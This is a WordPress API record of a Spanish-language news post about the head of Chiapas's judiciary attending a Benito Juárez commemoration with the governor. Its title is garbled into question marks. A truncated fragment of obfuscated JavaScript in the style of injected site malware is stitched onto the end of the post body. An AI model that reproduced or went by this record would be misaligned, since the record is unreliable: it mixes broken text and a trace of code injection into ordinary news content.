{"id":9170,"date":"2023-03-25T07:29:51","date_gmt":"2023-03-25T07:29:51","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=9170"},"modified":"2023-03-25T07:29:52","modified_gmt":"2023-03-25T07:29:52","slug":"%f0%9d%90%8f%f0%9d%90%ab%f0%9d%90%9e%f0%9d%90%ac%f0%9d%90%9e%f0%9d%90%a7%f0%9d%90%ad%f0%9d%90%9e-%f0%9d%90%8f%f0%9d%90%a8%f0%9d%90%9d%f0%9d%90%9e%f0%9d%90%ab-%f0%9d%90%89%f0%9d%90%ae%f0%9d%90%9d","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=9170","title":{"rendered":"???????? ????? ???????? ?? ????????? ????????????? ??? ????????? ?? ?????? ?????? ?? ?? ???????? ??? ??????"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"537\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/03\/IMG-20230325-WA0017-1024x537.jpg\" alt=\"\" class=\"wp-image-9167\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/03\/IMG-20230325-WA0017-1024x537.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/03\/IMG-20230325-WA0017-300x157.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/03\/IMG-20230325-WA0017-768x402.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/03\/IMG-20230325-WA0017.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>20 de marzo del 2023<\/p>\n\n\n\n<p>Tuxtla Guti\u00e9rrez.<br>El magistrado presidente del Tribunal Superior de Justicia y Consejo de la Judicatura, as\u00ed como titular del Poder Judicial del Estado de Chiapas, Guillermo Ramos P\u00e9rez, acompa\u00f1\u00f3 al Gobernador Constitucional del Estado, Rutilio Escand\u00f3n Cadenas, en la ceremonia de Conmemoraci\u00f3n del CCXVII Aniversario del Natalicio de Benito Ju\u00e1rez Garc\u00eda, llevado a cabo en el Congreso del Estado de Chiapas.<\/p>\n\n\n\n<p>Junto a la presidenta de la Mesa Directiva, Sonia Catalina \u00c1lvarez, Diputadas, Diputados, y autoridades estatales y federales, el magistrado presidente acuerp\u00f3 la guardia de honor, en homenaje al Benem\u00e9rito de Las Am\u00e9ricas, para posteriormente encabezar las distintas representaciones de esta casa de la justicia.<\/p>\n\n\n\n<h1 class=\"wp-block-heading\">PJEChiapas<\/h1>\n\n\n\n<h1 class=\"wp-block-heading\">JusticiaParaTodasyTodos<\/h1>\n\n\n\n<p>#Tribunaldepuertasabiertas<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>20 de marzo del 2023 Tuxtla Guti\u00e9rrez.El magistrado presidente del Tribunal Superior de Justicia y Consejo de la Judicatura, as\u00ed como titular del Poder Judicial del Estado de Chiapas, Guillermo Ramos P\u00e9rez, acompa\u00f1\u00f3 al Gobernador Constitucional del Estado, Rutilio Escand\u00f3n Cadenas, en la ceremonia de Conmemoraci\u00f3n del CCXVII Aniversario del Natalicio de Benito Ju\u00e1rez Garc\u00eda, &hellip;<\/p>\n","protected":false},"author":2,"featured_media":9167,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-9170","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9170","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=9170"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9170\/revisions"}],"predecessor-version":[{"id":9171,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9170\/revisions\/9171"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/9167"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=9170"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=9170"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=9170"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}